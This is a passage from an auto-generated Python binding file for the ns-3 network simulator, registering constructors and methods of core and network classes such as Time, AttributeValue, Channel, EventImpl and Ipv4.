[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3Channel_methods(root_module, cls):
## channel.h (module 'network'): ns3::Channel::Channel(ns3::Channel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Channel const &', 'arg0')])
## channel.h (module 'network'): ns3::Channel::Channel() [constructor]
cls.add_constructor([])
## channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Channel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): static ns3::TypeId ns3::Channel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3Ipv4_methods(root_module, cls):
## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4(ns3::Ipv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')])
## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4() [constructor]
cls.add_constructor([])
## ipv4.h (module 'internet'): bool ns3::Ipv4::AddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('AddAddress',
'bool',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddInterface',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4::GetAddress(uint32_t interface, uint32_t addressIndex) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForAddress(ns3::Ipv4Address address) const [member function]
cls.add_method('GetInterfaceForAddress',
'int32_t',
[param('ns3::Ipv4Address', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
cls.add_method('GetInterfaceForDevice',
'int32_t',
[param('ns3::Ptr< ns3::NetDevice const >', 'device')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): int32_t ns3::Ipv4::GetInterfaceForPrefix(ns3::Ipv4Address address, ns3::Ipv4Mask mask) const [member function]
cls.add_method('GetInterfaceForPrefix',
'int32_t',
[param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMetric(uint32_t interface) const [member function]
cls.add_method('GetMetric',
'uint16_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint16_t ns3::Ipv4::GetMtu(uint32_t interface) const [member function]
cls.add_method('GetMtu',
'uint16_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNAddresses(uint32_t interface) const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::GetNInterfaces() const [member function]
cls.add_method('GetNInterfaces',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4::GetNetDevice(uint32_t interface) [member function]
cls.add_method('GetNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4::GetRoutingProtocol() const [member function]
cls.add_method('GetRoutingProtocol',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): static ns3::TypeId ns3::Ipv4::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::Insert(ns3::Ptr<ns3::Ipv4L4Protocol> protocol) [member function]
cls.add_method('Insert',
'void',
[param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
cls.add_method('IsDestinationAddress',
'bool',
[param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsForwarding(uint32_t interface) const [member function]
cls.add_method('IsForwarding',
'bool',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::IsUp(uint32_t interface) const [member function]
cls.add_method('IsUp',
'bool',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::RemoveAddress(uint32_t interface, uint32_t addressIndex) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SelectSourceAddress',
'ns3::Ipv4Address',
[param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetDown(uint32_t interface) [member function]
cls.add_method('SetDown',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetForwarding(uint32_t interface, bool val) [member function]
cls.add_method('SetForwarding',
'void',
[param('uint32_t', 'interface'), param('bool', 'val')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetMetric(uint32_t interface, uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint32_t', 'interface'), param('uint16_t', 'metric')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
cls.add_method('SetRoutingProtocol',
'void',
[param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetUp(uint32_t interface) [member function]
cls.add_method('SetUp',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4.h (module 'internet'): ns3::Ipv4::IF_ANY [variable]
cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::GetIpForward() const [member function]
cls.add_method('GetIpForward',
'bool',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): bool ns3::Ipv4::GetWeakEsModel() const [member function]
cls.add_method('GetWeakEsModel',
'bool',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetIpForward(bool forward) [member function]
cls.add_method('SetIpForward',
'void',
[param('bool', 'forward')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## ipv4.h (module 'internet'): void ns3::Ipv4::SetWeakEsModel(bool model) [member function]
cls.add_method('SetWeakEsModel',
'void',
[param('bool', 'model')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
